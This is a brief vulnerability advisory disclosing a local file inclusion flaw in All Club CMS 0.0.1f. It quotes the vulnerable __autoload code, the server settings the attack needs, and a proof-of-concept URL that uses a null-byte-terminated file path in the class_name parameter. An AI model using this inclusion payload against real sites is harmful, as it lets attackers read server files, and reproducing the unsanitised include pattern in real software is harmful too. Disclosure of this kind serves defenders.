All Club CMS versions 0.0.1f and below suffer from a local file inclusion vulnerability in index.php.
7b484d9c53345d3a9f9556d695fc6149c1573cb91ba442195bac31775e0d697f
Vulnerability: File Inclusion
Software Vulnerable:
All Club CMS 0.0.1f and maybe prior versions.
Vulnerable Code:
---
function __autoload($class_name) {
require_once 'includes/'.$class_name . '.php';
}
---
Download:
https://sourceforge.net/project/showfiles.php?group_id=209058
Server should have:
Register Globals: On
Magic_quotes_gpc: Off
Exploit :
https://www.vulnerable.com/accms_site/index.php?class_name=[LFI]%00
Greetz:
P1mp4m.es--> pepepistola, musashi, patoruzu, ElvisPresley and sky
Yashira.org--> PescaoDeth, Garcez, Crackneo, alexhk_23 and all users of yashira as dapaf, el_manguan, etc.
Author: Trancek